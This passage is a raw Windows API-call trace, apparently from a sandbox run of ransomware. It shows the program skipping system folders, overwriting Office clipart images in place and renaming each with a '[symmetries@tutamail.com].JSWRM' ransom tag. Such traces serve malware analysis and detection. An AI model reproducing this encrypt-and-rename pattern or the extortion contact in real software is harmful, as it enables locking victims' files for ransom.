(lpString1="J0099188.JPG", lpString2="perflogs") returned -1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2="documents and settings") returned 1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2="system volume information") returned -1 [0079.952] lstrcmpiW (lpString1="J0099188.JPG", lpString2="msocache") returned -1 [0079.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0079.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099188.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099188.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099188.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0079.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0079.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099188.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099188.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099188.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0079.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0079.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099188.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.953] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9080) returned 1 [0079.953] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2370) returned 0x24d210 [0079.953] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2370, lpOverlapped=0x0) returned 1 [0079.955] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.955] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2370, lpOverlapped=0x0) returned 1 [0079.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.956] CloseHandle (hObject=0x314) returned 1 [0079.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0079.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0079.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0079.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0079.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.956] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099188.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099188.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099188.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0079.957] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe18c9a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f8c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099189.JPG", cAlternateFileName="")) returned 1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2=".") returned 1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="..") returned 1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="...") returned 1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="windows") returned -1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="recovery") returned -1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="perflogs") returned -1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="documents and settings") returned 1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="system volume information") returned -1 [0079.957] lstrcmpiW (lpString1="J0099189.JPG", lpString2="msocache") returned -1 [0079.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099189.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099189.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099189.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0079.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099189.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099189.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099189.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0079.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099189.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.958] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8076) returned 1 [0079.958] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f80) returned 0x205850 [0079.958] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f80, lpOverlapped=0x0) returned 1 [0079.960] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.960] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f80, lpOverlapped=0x0) returned 1 [0079.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.960] CloseHandle (hObject=0x314) returned 1 [0079.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0079.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0079.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0079.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0079.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0079.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0079.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.961] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099189.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099189.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099189.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0079.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0079.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.961] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xab74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099190.JPG", cAlternateFileName="")) returned 1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2=".") returned 1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="..") returned 1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="...") returned 1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="windows") returned -1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="recovery") returned -1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="perflogs") returned -1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="documents and settings") returned 1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="system volume information") returned -1 [0079.962] lstrcmpiW (lpString1="J0099190.JPG", lpString2="msocache") returned -1 [0079.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0079.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099190.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099190.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099190.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0079.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0079.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099190.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099190.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099190.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0079.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0079.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.962] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0079.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099190.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.963] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43892) returned 1 [0079.963] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xab70) returned 0x24d210 [0079.963] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xab70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xab70, lpOverlapped=0x0) returned 1 [0079.967] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.967] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xab70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xab70, lpOverlapped=0x0) returned 1 [0079.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.968] CloseHandle (hObject=0x314) returned 1 [0079.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0079.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0079.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0079.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0079.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0079.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.969] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099190.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099190.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099190.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0079.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0079.970] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe56c811, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf39f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099191.JPG", cAlternateFileName="")) returned 1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2=".") returned 1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="..") returned 1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="...") returned 1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="windows") returned -1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="recovery") returned -1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="perflogs") returned -1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="documents and settings") returned 1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="$RECYCLE.BIN") returned 1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="system volume information") returned -1 [0079.970] lstrcmpiW (lpString1="J0099191.JPG", lpString2="msocache") returned -1 [0079.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099191.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099191.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099191.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099191.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099191.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099191.JPG", lpUsedDefaultChar=0x0) returned 12 [0079.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0079.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 